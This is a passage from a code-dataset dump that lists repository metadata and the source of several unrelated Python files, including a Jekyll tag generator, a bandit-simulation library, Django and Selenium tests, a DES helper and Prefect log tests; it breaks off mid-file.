blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ddf09f47a9f2f78bb205d5e2492c3e024e6601e2 | 64ae05ddc478c214208f8d828447a3407ee12f30 | /tag_generator.py | 3c185d85e016c279a0743232fd0dbf3c4b8ea69b | [
"MIT"
] | permissive | ryan-kwan-do/ryan-kwan-do.github.io | 3618f991d09f203120f1fbccc84de87cd0cff0f4 | df1637c762c5cb3dd135474363765b815f16786a | refs/heads/master | 2021-04-29T09:01:23.801034 | 2020-06-08T10:19:04 | 2020-06-08T10:19:04 | 77,638,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | #!/usr/bin/env python
'''
tag_generator.py
Copyright 2017 Long Qian
Contact: lqian8@jhu.edu
This script creates tags for your Jekyll blog hosted by Github page.
No plugins required.
'''
import glob
import os
post_dir = '_texts/'
tag_dir = 'tag/'
filenames = glob.glob(post_dir + '*md')
total_tags = []
for filename in filenames:
f = open(filename, 'r', encoding='utf8')
crawl = False
for line in f:
if crawl:
current_tags = line.strip().split()
if current_tags[0] == 'tags:':
total_tags.extend(current_tags[1:])
crawl = False
break
if line.strip() == '---':
if not crawl:
crawl = True
else:
crawl = False
break
f.close()
total_tags = set(total_tags)
old_tags = glob.glob(tag_dir + '*.md')
for tag in old_tags:
os.remove(tag)
if not os.path.exists(tag_dir):
os.makedirs(tag_dir)
for tag in total_tags:
tag_filename = tag_dir + tag + '.md'
f = open(tag_filename, 'a')
write_str = '---\nlayout: tagpage\ntitle: \"Tag: ' + tag + '\"\ntag: ' + tag + '\nrobots: noindex\n---\n'
f.write(write_str)
f.close()
print("Tags generated, count", total_tags.__len__())
| [
"hello@ryanarmstrong.me"
] | hello@ryanarmstrong.me |
645ec5d8848843052470e3ac49f92599668cbea7 | 4e6e8c4b6c4e516e546ce17b887d43e6fd7a4100 | /py2store/scraps/old/data_writer.py | d35da60f068a56546a4f67cfad0b817491636f52 | [
"Apache-2.0"
] | permissive | i2mint/py2misc | fa60d81bab31d9b13579651d673a3622a8034c56 | 1ee704b1ab8dc33dd043c4332a444f41f0026189 | refs/heads/master | 2023-04-14T03:12:50.878497 | 2023-04-03T06:58:22 | 2023-04-03T06:58:22 | 200,088,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | from collections.abc import MutableMapping
from py2store.scraps.old.obj_source import DictObjSource
class DataWriter(MutableMapping):
"""
Interface for an DataWriter.
An DataWriter offers the basic methods: __getitem__, __len__ and __iter__, along with the consequential
mixin methods that collections.abc.Mapping adds automatically:
__contains__, keys, items, values, get, __eq__, and __ne__
(see https://docs.python.org/3/library/collections.abc.html)
"""
def __setitem__(self, k, v):
raise NotImplementedError("Need to implement in concrete class")
def __delitem__(self, k):
raise NotImplementedError("Need to implement in concrete class")
def clear(self):
print('''
The MutableMapping clear method was overridden to make dangerous difficult.
If you really want to delete all your data, you can do so by doing:
try:
while True:
self.popitem()
except KeyError:
pass''')
class DictDataWriter(DictObjSource, DataWriter):
"""
An implementation of an DataWriter that uses a dict to store things.
An ObjSource offers the basic methods: __getitem__, __len__ and __iter__, along with the consequential
mixin methods that collections.abc.Mapping adds automatically:
__contains__, keys, items, values, get, __eq__, and __ne__
>>> dw = DictDataWriter() # make an empty data writer, and write two items
>>> dw['foo'] = 'bar'
>>> dw['hello'] = 'world'
>>> len(dw) # how many items do we have?
2
>>> list(dw) # what are their keys?
['foo', 'hello']
>>> list(dw.items()) # what (key, value) pairs do we have?
[('foo', 'bar'), ('hello', 'world')]
>>> list(dw.keys()) # just the keys (same as list(dw), but dw.keys() gives us a KeysView)
['foo', 'hello']
>>> list(dw.values()) # see the values
['bar', 'world']
>>> del dw['foo'] # delete 'foo'
>>> list(dw) # see that only 'hello' is left
['hello']
>>>
>>> # adding some more data
>>> dw[42] = 'forty two'
>>> dw[('e', 'mc', 2)] = 'tuple keys work' # actually, any hashable can be a key!
>>> list(dw)
['hello', 42, ('e', 'mc', 2)]
>>>
>>> dw.pop(('e', 'mc', 2)) # pop data (get the data stored in a key, and remove it)
'tuple keys work'
>>> list(dw) # see what's left
['hello', 42]
>>> dw.popitem() # pop an arbitrary item
('hello', 'world')
>>> list(dw)
[42]
>>> 42 in dw
True
>>> dw.setdefault('this key does not exist', 'this is my default')
'this is my default'
>>> list(dw)
[42, 'this key does not exist']
>>> list(dw.items())
[(42, 'forty two'), ('this key does not exist', 'this is my default')]
>>> dw.update({42: 'not forty two anymore'})
>>> list(dw.items())
[(42, 'not forty two anymore'), ('this key does not exist', 'this is my default')]
>>> dw.clear() # should be the "delete everything" method, but has been overridden for safe keeping
<BLANKLINE>
The MutableMapping clear method was overridden to make dangerous difficult.
If you really want to delete all your data, you can do so by doing:
try:
while True:
self.popitem()
except KeyError:
pass
"""
def __setitem__(self, k, v):
self._d[k] = v
def __delitem__(self, k):
del self._d[k]
| [
"thor@otosense.com"
] | thor@otosense.com |
a5177aabae7639bdb29fe0a4a0293316bd0c201f | a16f8a38725c306e80126bfb66f9d1953e8ee96a | /coba/simulations.py | 6ac39199e627c80da0552fbc3f8764bedfd27856 | [
"BSD-3-Clause"
] | permissive | pmineiro/coba | b5cd694abef5aa8e6cb74a9b86cb741c4a81bad1 | c3a2963f84c3d41bdaf1e5205278f2cbcda61046 | refs/heads/master | 2023-01-12T18:05:08.797525 | 2020-11-16T17:35:56 | 2020-11-16T17:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,600 | py | """The simulations module contains core classes and types for defining contextual bandit simulations.
This module contains the abstract interface expected for bandit simulations along with the
class defining an Interaction within a bandit simulation. Additionally, this module also contains
the type hints for Context, Action and Reward. These type hints don't contain any functionality.
Rather, they simply make it possible to use static type checking for any project that desires
to do so.
TODO Add RegressionSimulation
"""
import gc
import csv
import json
from collections import defaultdict
from itertools import compress, repeat, count, chain
from abc import ABC, abstractmethod
from typing import (
Optional, Iterable, Sequence, List, Union, Callable,
TypeVar, Generic, Hashable, Dict, Any, Tuple
)
import coba.random
from coba.data import Source, HttpSource, DiskSource
from coba.preprocessing import FactorEncoder, FullMeta, PartMeta, OneHotEncoder, NumericEncoder, Encoder
from coba.execution import ExecutionContext
Context = Optional[Hashable]
Action = Hashable
Reward = float
Key = int
Choice = int
_C_out = TypeVar('_C_out', bound=Context, covariant=True)
_A_out = TypeVar('_A_out', bound=Action, covariant=True)
class Interaction(Generic[_C_out, _A_out]):
"""A class to contain all data needed to represent an interaction in a bandit simulation."""
#this is a problem with pylance compaining about covariance in constructor so we have to type ignore it.
#See this ticket in mypy for more info https://github.com/python/mypy/issues/2850
def __init__(self, context: _C_out, actions: Sequence[_A_out], key: Key = 0) -> None: #type: ignore
"""Instantiate Interaction.
Args
context: Features describing the interactions's context. Will be `None` for multi-armed bandit simulations.
actions: Features describing available actions in the interaction.
key : A unique key assigned to this interaction.
"""
assert actions, "At least one action must be provided to interact"
self._context = context
self._actions = actions
self._key = key
@property
def context(self) -> _C_out:
"""The interaction's context description."""
return self._context
@property
def actions(self) -> Sequence[_A_out]:
"""The interactions's available actions."""
return self._actions
@property
def key(self) -> Key:
"""A unique key identifying the interaction."""
return self._key
class Simulation(Generic[_C_out, _A_out], ABC):
"""The simulation interface."""
@property
@abstractmethod
def interactions(self) -> Sequence[Interaction[_C_out, _A_out]]:
"""The sequence of interactions in a simulation.
Remarks:
All Benchmark assume that interactions is re-iterable. So long as interactions is
a Sequence it will always be re-iterable. If interactions was merely Iterable then
it would be possible for it to only allow enumeration one time.
"""
...
@abstractmethod
def rewards(self, choices: Sequence[Tuple[Key,Choice]] ) -> Sequence[Reward]:
"""The observed rewards for interactions (identified by its key) and their selected action indexes.
Args:
choices: A sequence of tuples containing an interaction key and an action index.
Returns:
A sequence of tuples containing context, action, and reward for the requested
interaction/action. This sequence will always align with the provided choices.
"""
...
class JsonSimulation(Simulation[Context, Action]):
"""A Simulation implementation which supports loading and unloading from json representations."""
def __init__(self, json_val) -> None:
"""Instantiate a JsonSimulation
Args:
json: A json representation that can be turned into a simulation when needed.
"""
self._json_obj = json.loads(json_val) if isinstance(json_val,str) else json_val
self._simulation: Optional[Simulation[Context, Action]] = None
def __enter__(self) -> 'JsonSimulation':
"""Load the simulation into memory. If already loaded do nothing."""
if self._simulation is None and self._json_obj["type"] == "classification":
self._simulation = ClassificationSimulation.from_json(self._json_obj["from"])
else:
raise Exception("We were unable to recognize the provided simulation type")
return self
def __exit__(self, exception_type, exception_value, traceback) -> None:
"""Unload the simulation from memory."""
if self._simulation is not None:
self._simulation = None
gc.collect() #in case the simulation is large
@property
def interactions(self) -> Sequence[Interaction[Context,Action]]:
"""The interactions in this simulation.
Remarks:
See the Simulation base class for more information.
"""
if self._simulation is not None:
return self._simulation.interactions
raise Exception("A JsonSimulation must be loaded before it can be used.")
def rewards(self, choices: Sequence[Tuple[Key,Choice]]) -> Sequence[Reward]:
"""The observed rewards for interactions (identified by its key) and their selected action indexes.
Remarks:
See the Simulation base class for more information.
"""
if self._simulation is not None:
return self._simulation.rewards(choices)
raise Exception("A JsonSimulation must be loaded before it can be used.")
class MemorySimulation(Simulation[_C_out, _A_out]):
"""A Simulation implementation created from in memory sequences of contexts, actions and rewards."""
def __init__(self,
contexts : Sequence[_C_out],
action_sets: Sequence[Sequence[_A_out]],
reward_sets: Sequence[Sequence[Reward]]) -> None:
"""Instantiate a MemorySimulation.
Args:
contexts: A collection of contexts to turn into a simulation.
action_sets: A collection of action sets to turn into a simulation
reward_sets: A collection of reward sets to turn into a simulation
"""
assert len(contexts) == len(action_sets) == len(reward_sets), "Mismatched lengths of contexts, actions and rewards"
self._interactions = list(map(Interaction, contexts, action_sets, count()))
choices = chain.from_iterable([ [ (i.key, a) for a in range(len(i.actions)) ] for i in self._interactions ])
rewards = chain.from_iterable(reward_sets)
self._rewards = dict(zip(choices,rewards))
@property
def interactions(self) -> Sequence[Interaction[_C_out,_A_out]]:
"""The interactions in this simulation.
Remarks:
See the Simulation base class for more information.
"""
return self._interactions
def rewards(self, choices: Sequence[Tuple[Key,Choice]]) -> Sequence[Reward]:
"""The observed rewards for interactions (identified by its key) and their selected action indexes.
Remarks:
See the Simulation base class for more information.
"""
return [ self._rewards[choice] for choice in choices]
class LambdaSimulation(Simulation[_C_out, _A_out]):
"""A Simulation created from lambda functions that generate contexts, actions and rewards.
Remarks:
This implementation is useful for creating simulations from defined distributions.
"""
def __init__(self,
n_interactions: int,
context : Callable[[int],_C_out],
action_set: Callable[[int],Sequence[_A_out]],
reward : Callable[[_C_out,_A_out],Reward],
seed: int = None) -> None:
"""Instantiate a LambdaSimulation.
Args:
n_interactions: How many interactions the LambdaSimulation should have.
context: A function that should return a context given an index in `range(n_interactions)`.
action_set: A function that should return all valid actions for a given context.
reward: A function that should return the reward for a context and action.
"""
coba.random.seed(seed)
contexts : List[_C_out] = []
action_sets: List[Sequence[_A_out]] = []
reward_sets: List[Sequence[Reward]] = []
for i in range(n_interactions):
_context = context(i)
_action_set = action_set(i)
_reward_set = [reward(_context, _action) for _action in _action_set]
contexts .append(_context)
action_sets.append(_action_set)
reward_sets.append(_reward_set)
self._simulation = MemorySimulation(contexts, action_sets, reward_sets)
@property
def interactions(self) -> Sequence[Interaction[_C_out,_A_out]]:
"""The interactions in this simulation.
Remarks:
See the Simulation base class for more information.
"""
return self._simulation.interactions
def rewards(self, choices: Sequence[Tuple[Key,Choice]]) -> Sequence[Reward]:
"""The observed rewards for interactions (identified by its key) and their selected action indexes.
Remarks:
See the Simulation base class for more information.
"""
return self._simulation.rewards(choices)
class ClassificationSimulation(Simulation[_C_out, Tuple[int,...]]):
"""A simulation created from classifier data with features and labels.
ClassificationSimulation turns labeled observations from a classification data set
set, into interactions. For each interaction the feature set becomes the context and
all possible labels become the actions. Rewards for each interaction are created by
assigning a reward of 1 for taking the correct action (i.e., choosing the correct
label)) and a reward of 0 for taking any other action (i.e., choosing any of the
incorrect lables).
Remark:
This class when created from a data set will load all data into memory. Be careful when
doing this if you are working with a large dataset. To reduce memory usage you can provide
meta information upfront that will allow features to be correctly encoded while the
dataset is being streamed instead of waiting until the end of the data to train an encoder.
"""
@staticmethod
def from_json(json_val:Union[str, Dict[str,Any]]) -> 'ClassificationSimulation[Context]':
"""Construct a ClassificationSimulation object from JSON.
Args:
json_val: Either a json string or the decoded json object.
Returns:
The ClassificationSimulation representation of the given JSON string or object.
"""
config = json.loads(json_val) if isinstance(json_val,str) else json_val
has_header : bool = True
default_meta: FullMeta = FullMeta()
defined_meta: Dict[Any, PartMeta] = {}
if config["format"] == "openml":
with ExecutionContext.Logger.log(f"loading openml {config['id']}..."):
return ClassificationSimulation.from_openml(config["id"], config.get("md5_checksum", None))
if config["format"] == "csv":
location : str = config["location"]
md5_checksum: Optional[str] = None
if "md5_checksum" in config:
md5_checksum = config["md5_checksum"]
if "has_header" in config:
has_header = config["has_header"]
if "column_default" in config:
default_meta = FullMeta.from_json(config["column_default"])
if "column_overrides" in config:
for key,value in config["column_overrides"].items():
defined_meta[key] = PartMeta.from_json(value)
return ClassificationSimulation.from_csv(
location = location,
md5_checksum = md5_checksum,
has_header = has_header,
default_meta = default_meta,
defined_meta = defined_meta
)
if config["format"] == "table":
table: Iterable[Sequence[str]] = config["table"]
if "has_header" in config:
has_header = config["has_header"]
if "column_default" in config:
default_meta = FullMeta.from_json(config["column_default"])
if "column_overrides" in config:
for key,value in config["column_overrides"].items():
defined_meta[key] = PartMeta.from_json(value)
return ClassificationSimulation.from_table(
table = table,
has_header = has_header,
default_meta = default_meta,
defined_meta = defined_meta
)
raise Exception("We were unable to recognize the provided data format.")
@staticmethod
def from_openml(data_id:int, md5_checksum:str = None) -> 'ClassificationSimulation[Context]':
"""Create a ClassificationSimulation from a given openml dataset id.
Args:
data_id: The unique identifier for a dataset stored on openml.
"""
openml_api_key = ExecutionContext.Config.openml_api_key
data_description_url = f'https://www.openml.org/api/v1/json/data/{data_id}'
task_description_url = f'https://www.openml.org/api/v1/json/task/list/data_id/{data_id}'
type_description_url = f'https://www.openml.org/api/v1/json/data/features/{data_id}'
if openml_api_key is not None:
data_description_url += f'?api_key={openml_api_key}'
task_description_url += f'?api_key={openml_api_key}'
type_description_url += f'?api_key={openml_api_key}'
descr = json.loads(''.join(HttpSource(data_description_url, '.json', None, 'descr').read()))["data_set_description"]
if descr['status'] == 'deactivated':
raise Exception(f"Openml {data_id} has been deactivated. This is often due to flags on the data.")
tasks = json.loads(''.join(HttpSource(task_description_url, '.json', None, 'tasks').read()))["tasks"]["task"]
if not any(task["task_type_id"] == 1 for task in tasks ):
raise Exception(f"Openml {data_id} does not appear to be a classification dataset")
types = json.loads(''.join(HttpSource(type_description_url, '.json', None, 'types').read()))["data_features"]["feature"]
defined_meta: Dict[str,PartMeta] = {}
for tipe in types:
defined_meta[tipe["name"]] = PartMeta(
ignore = tipe["is_ignore"] == "true" or tipe["is_row_identifier"] == "true",
label = tipe["is_target"] == "true",
encoder = NumericEncoder() if tipe['data_type'] == 'numeric' else FactorEncoder(tipe['nominal_value'], error_if_unknown=True)
)
csv_url = f"http://www.openml.org/data/v1/get_csv/{descr['file_id']}"
return ClassificationSimulation.from_csv(csv_url, md5_checksum=md5_checksum, defined_meta=defined_meta)
@staticmethod
def from_csv(
location : str,
label_col : Union[None,str,int] = None,
md5_checksum: Optional[str] = None,
csv_reader : Callable[[Iterable[str]], Iterable[Sequence[str]]] = csv.reader, #type: ignore #pylance complains
has_header : bool = True,
default_meta: FullMeta = FullMeta(),
defined_meta: Dict[Any,PartMeta] = {}) -> 'ClassificationSimulation[Context]':
"""Create a ClassificationSimulation given the location of a csv formatted dataset.
Args:
location: The location of the csv formatted dataset.
label_col: The name of the column in the csv file that represents the label.
md5_checksum: The expected md5 checksum of the csv dataset to ensure data integrity.
csv_reader: A method to parse file lines at csv_path into their string values.
has_header: Indicates if the csv file has a header row.
default_meta: The default meta values for all columns unless explictly overridden with column_metas.
column_metas: Keys are column name or index, values are meta objects that override the default values.
"""
source: Source[Iterable[str]]
if not location.lower().startswith('http'):
source = DiskSource(location)
else:
source = HttpSource(location, ".csv", md5_checksum, 'data')
csv_rows = list(csv_reader(source.read()))
with ExecutionContext.Logger.log('encoding data... '):
return ClassificationSimulation.from_table(csv_rows, label_col, has_header, default_meta, defined_meta)
@staticmethod
def from_table(
table : Iterable[Sequence[str]],
label_col : Union[None,str,int] = None,
has_header : bool = True,
default_meta: FullMeta = FullMeta(),
defined_meta: Dict[Any, PartMeta] = {}) -> 'ClassificationSimulation[Context]':
"""Create a ClassifierSimulation from the rows contained in a csv formatted dataset.
Args:
table: Any iterable of rows (i.e., sequence of str) with each row containing features/labels.
label_col: Either the column index or the header name for the label column.
has_header: Indicates if the first row in the table contains column names
default_meta: The default meta values for all columns unless explictly overridden with column_metas.
defined_meta: Keys are column name or index, values are meta objects that override the default values.
"""
# In theory we don't have to load the whole file up front. However, in practice,
# not loading the file upfront is hard due to the fact that Python can't really
# guarantee a generator will close a file.
# For more info see https://stackoverflow.com/q/29040534/1066291
# For more info see https://www.python.org/dev/peps/pep-0533/
itable = filter(None, iter(table)) #filter out empty rows
#get first row to determine number of columns and
#then put the first row back for later processing
first = next(itable)
n_col = len(first)
itable = chain([first], itable)
header: Sequence[str] = next(itable) if has_header else []
label_index = header.index(label_col) if label_col in header else label_col if isinstance(label_col,int) else None # type: ignore
if isinstance(label_col, str) and label_col not in header:
raise Exception("We were unable to find the label column in the header row (or there was no header row).")
if any(map(lambda key: isinstance(key,str) and key not in header, defined_meta)):
raise Exception("We were unable to find a meta column in the header row (or there was no header row).")
def index(key: Union[int,str]):
return header.index(key) if isinstance(key,str) else key
over_metas = defaultdict(PartMeta, { index(key):val for key,val in defined_meta.items() } )
metas = [ default_meta.override(over_metas[i]) for i in range(n_col) ]
if label_index is not None:
metas[label_index] = metas[label_index].override(PartMeta(label=True))
#after extensive testing I found that performing many loops with simple logic
#was about 3 times faster than performing one or two loops with complex logic
#extract necessary meta data one time
is_not_ignores = [ not m.ignore for m in metas ]
#transform rows into columns
columns = list(zip(*itable))
#remove ignored columns
metas = list(compress(metas, is_not_ignores))
columns = list(compress(columns, is_not_ignores))
#create encoding groups according to column type
label_encodings : List[Sequence[Hashable]] = []
feature_encodings: List[Sequence[Hashable]] = []
#encode columns and place in appropriate group
for col, m in zip(columns, metas):
encoding = label_encodings if m.label else feature_encodings
encoder = m.encoder if m.encoder.is_fit else m.encoder.fit(col)
if isinstance(encoder, OneHotEncoder):
encoding.extend(list(zip(*encoder.encode(col))))
else:
encoding.append(encoder.encode(col))
#transform columns back into rows
features = list(zip(*feature_encodings)) #type: ignore
labels = list(zip(*label_encodings)) #type: ignore
#turn singular tuples into their values
contexts = [ f if len(f) > 1 else f[0] for f in features ]
actions = [ l if len(l) > 1 else l[0] for l in labels ]
return ClassificationSimulation(contexts, actions)
def __init__(self, features: Sequence[_C_out], labels: Sequence[Action]) -> None:
"""Instantiate a ClassificationSimulation.
Args:
features: The collection of features used for the original classifier problem.
labels: The collection of labels assigned to each observation of features.
"""
assert len(features) == len(labels), "Mismatched lengths of features and labels"
action_set = list(set(labels))
contexts = features
actions = list(repeat(OneHotEncoder(action_set).encode(action_set), len(contexts)))
rewards = OneHotEncoder(action_set).encode(labels)
self._action_set = action_set
self._simulation = MemorySimulation(contexts, actions, rewards)
@property
def interactions(self) -> Sequence[Interaction[_C_out, Tuple[int,...]]]:
"""The interactions in this simulation.
Remarks:
See the Simulation base class for more information.
"""
return self._simulation.interactions
def rewards(self, choices: Sequence[Tuple[Key,Choice]]) -> Sequence[Reward]:
"""The observed rewards for interactions (identified by its key) and their selected action indexes.
Remarks:
See the Simulation base class for more information.
"""
return self._simulation.rewards(choices) | [
"rucker.mark@gmail.com"
] | rucker.mark@gmail.com |
573d56e8d5f6dc0a9dec7a2af9be5f84e0ddc6c0 | 0d4250be9a9431528a94aaf397b398022730d1cb | /functional_tests/test_list_item_validation.py | 6f51eae18854b4e8b11cd4056f45792ca456cde7 | [] | no_license | sward1/tdd | 07cc8c9859e7862c040016467f862d1eb2b3836e | 495e0ab74ab23006926c031b349b1092b1f94b6c | refs/heads/master | 2021-01-10T18:37:04.766809 | 2015-04-24T15:52:47 | 2015-04-24T15:52:47 | 33,563,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | from unittest import skip
from .base import FunctionalTest
class ItemValidationTest(FunctionalTest):
def get_error_element(self):
return self.browser.find_element_by_css_selector('.has-error')
def test_cannot_add_empty_list_items(self):
# Edith goes to the home page and accidentally tries to submit
# an empty list item. She hits enter on the empty input box
self.browser.get(self.server_url)
self.get_item_input_box().send_keys('\n')
# The home page refreshes, and there is an error message saying
# that list items cannot be blank
error = self.get_error_element()
self.assertEqual(error.text, "You can't have an empty list item")
# she tries again with some text for the item, which now works
self.get_item_input_box().send_keys('Buy milk\n')
self.check_for_row_in_list_table('1: Buy milk')
# Perversely, she now decides to submit a second blank list item
self.get_item_input_box().send_keys('\n')
# She receives a similar warning on the list page
self.check_for_row_in_list_table('1: Buy milk')
error = self.get_error_element()
self.assertEqual(error.text, "You can't have an empty list item")
# And she can correct it by filling some text in
self.get_item_input_box().send_keys('Make tea\n')
self.check_for_row_in_list_table('1: Buy milk')
self.check_for_row_in_list_table('2: Make tea')
def test_cannot_add_duplicate_items(self):
# Edith goes to the home page and starts a new list
self.browser.get(self.server_url)
self.get_item_input_box().send_keys('Buy wellies\n')
self.check_for_row_in_list_table('1: Buy wellies')
# She accidentally tries to enter a duplicate item
self.get_item_input_box().send_keys('Buy wellies\n')
# She sees a helpful error message
self.check_for_row_in_list_table('1: Buy wellies')
error = self.get_error_element()
self.assertEqual(error.text, "You've already got this in your list")
def test_error_messages_are_cleared_on_input(self):
# Edith starts a new list in a way that causes a validation error
self.browser.get(self.server_url)
self.get_item_input_box().send_keys('\n')
error = self.get_error_element()
self.assertTrue(error.is_displayed())
# She starts typing in the input box to clear the error
self.get_item_input_box().send_keys('a')
# She is pleased to see that the error message disappears
error = self.get_error_element()
self.assertFalse(error.is_displayed())
| [
"stephenjward1@gmail.com"
] | stephenjward1@gmail.com |
303637e4e2c0872d7c466e7edbcdc7342dabb578 | 6feb9f4729a4bd13c678ba1a0f29a9fede1ae906 | /runner.py | b46c0e6bd3042960f4424158bd2dd4ec1951b06b | [] | no_license | bejerome/Testdemo | 1031d6c0c012e73891ba8efe07d97f06bf4ea402 | b5f45762635b56c6d52b46def296b2f40d5fc0f0 | refs/heads/main | 2023-08-24T11:28:31.987730 | 2021-09-29T16:46:00 | 2021-09-29T16:46:00 | 411,760,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | __author__ = 'Ben'
import unittest
from Tests.login_test_suite import LoginTest
import os
import HtmlTestRunner
direct = os.getcwd()
class MyTestSuite(unittest.TestCase):
def testIssue(self):
smoke_test = unittest.TestSuite()
smoke_test.addTests([
unittest.defaultTestLoader.loadTestsFromTestCase(LoginTest),
])
runner1 = HtmlTestRunner.HTMLTestRunner(
output="./reports/",
report_title="Demo Test Suite",
descriptions=True,
add_timestamp=True,
open_in_browser=True
)
runner1.run(smoke_test)
if __name__ == '__main__':
unittest.main()
| [
"benjaminjjerome@gmail.com"
] | benjaminjjerome@gmail.com |
916417b7dddb729035932c4ce63759c55fd9fa89 | 32453c2e63c8060cf81c52443cf481a83f450aeb | /UserApp/migrations/0001_initial.py | 1db7da94ce1849cbd7981422ab862c9ebde1d77d | [] | no_license | sz66cm/dgrentapp | d0d70bc236ad5fe8a7c9adf0364730e7a54fb0ee | bb78ee037353bc0ba5788563dd5a8ef068501fb2 | refs/heads/master | 2021-01-09T20:08:28.320340 | 2016-08-12T12:44:15 | 2016-08-12T12:44:15 | 65,522,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,936 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-10 09:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Cost',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('type_id', models.IntegerField()),
('cost_num', models.DecimalField(decimal_places=2, max_digits=8)),
('start', models.TimeField(auto_now_add=True)),
('end', models.TimeField()),
],
),
migrations.CreateModel(
name='CostType',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('type_name', models.CharField(max_length=30)),
('unit', models.CharField(max_length=50)),
('rate', models.DecimalField(decimal_places=2, max_digits=7)),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('type_id', models.IntegerField()),
('user_name', models.CharField(max_length=15)),
('head_pic', models.CharField(max_length=100)),
('phone', models.CharField(max_length=50, unique=True)),
('is_left', models.BooleanField()),
],
),
migrations.CreateModel(
name='UserType',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('type_name', models.CharField(max_length=30)),
('description', models.CharField(max_length=300)),
],
),
]
| [
"sz66cm@163.com"
] | sz66cm@163.com |
159b6bf20963afd927a24e9c72ab4a79942ea609 | 17f72515f96fba80a00230132c69cd4f2809c58d | /sample.py | 3571450a04c11f8107aecd6b2373fe7f8365be3b | [] | no_license | asha952/tutorialtweetgen | daa6ac794d472167a4cd24b6c8eaf0606196a7a2 | 05f098696c0c0fe116e82b0ef614e9363a2b1df8 | refs/heads/master | 2020-12-19T08:47:50.432253 | 2020-03-06T05:22:03 | 2020-03-06T05:22:03 | 235,686,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | import random
from word_frequency import histogram
def dict_sample(histogram):
word_count = 0
word_count += sum(hist[word] for word in hist.keys())
word_range = 0
histogram = {}
random_int = random.random()
for key in hist.keys():
histogram[key] = hist[key] / word_count
if word_range < random_int <= word_range + histogram[key]:
return key
word_range += histogram[key]
if __name__ == "__main__":
filename = 'words.txt'
word_histogram = {}
with open(filename, 'r') as f:
words = f.read().split(' ')
hist = histogram(words)
print(dict_sample(hist))
| [
"ashabsiddiqui952@gmail.com"
] | ashabsiddiqui952@gmail.com |
691aa804118899e915ea14af3accf1e1eaf3af76 | 1006a954e2fb0eb20e20bd4702c923d886fec852 | /7DES/utils_prodtrans.py | e5f08ba3339ed2efb982954ef20bfd136de69368 | [] | no_license | ujn7843/Crytography_Assignment | b4eeecdb13e6c0bc1898dc5401cafcbeb7422b98 | 9a2ddda30b15fcc6f91499ce88ec5ad41255ba8a | refs/heads/master | 2022-03-21T07:46:50.563055 | 2019-12-25T00:09:06 | 2019-12-25T00:09:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | from utils_key import *
def ProductTrans(L0, R0, i):
'''
Arguments:
L0: 第i-1轮输入数据的左半部分
R0: 第i-1轮输入数据的右半部分
i: 轮数
Returns:
Li: 第i轮的输入的左半部分
Ri: 第i轮的输入的右半部分
'''
R1 = Expansion(R0) # 选择扩展运算E
key = GenerateKey(i) # 生成密钥
R2 = xor(R1, key) # 密钥加密运算
R3 = Sbox(R2, S_box) # 选择压缩运算S
R4 = ReplaceFunc(R3, P_box) # 置换运算P
R5 = xor(R4, L0) # 左右做异或运算
Ri = R5.reshape((8, 4))
Li = R0.reshape((8, 4))
return Li, Ri | [
"noreply@github.com"
] | ujn7843.noreply@github.com |
72331551bdcfaaed464d0a85970737b617219850 | 8c2d923f54e98e79e40dada15252fe0fd03d0d7b | /server/tests/graphql/test_logs.py | a2446cc813f4719773699253c95c275fc32ffc0f | [
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] | permissive | manesioz/prefect | 0069583f2b248661e8eb38ae104930551b09eedc | f2ae050df8258aebfc0a97ffcd3e38344180f53e | refs/heads/master | 2021-03-06T04:55:53.000101 | 2020-06-22T19:39:41 | 2020-06-22T19:39:41 | 246,180,294 | 0 | 0 | Apache-2.0 | 2020-06-22T19:39:42 | 2020-03-10T01:31:40 | null | UTF-8 | Python | false | false | 5,391 | py | # Licensed under the Prefect Community License, available at
# https://www.prefect.io/legal/prefect-community-license
import asyncio
import pendulum
import pytest
from prefect_server.database import models
class TestWriteRunLogs:
mutation = """
mutation($input: write_run_logs_input!) {
write_run_logs(input: $input) {
success
}
}
"""
async def test_create_flow_run_logs(self, run_query, flow_run_id):
logs = [dict(flow_run_id=flow_run_id, message="test") for _ in range(10)]
result = await run_query(
query=self.mutation, variables=dict(input=dict(logs=logs)),
)
assert result.data.write_run_logs.success
await asyncio.sleep(0.5)
logs = await models.Log.where({"flow_run_id": {"_eq": flow_run_id}}).get(
{"message", "task_run_id"}
)
assert len(logs) == 10
assert all(log.message == "test" for log in logs)
assert all(log.task_run_id is None for log in logs)
async def test_create_task_run_logs(self, run_query, flow_run_id, task_run_id):
logs = [
dict(flow_run_id=flow_run_id, task_run_id=task_run_id, message="test")
for _ in range(14)
]
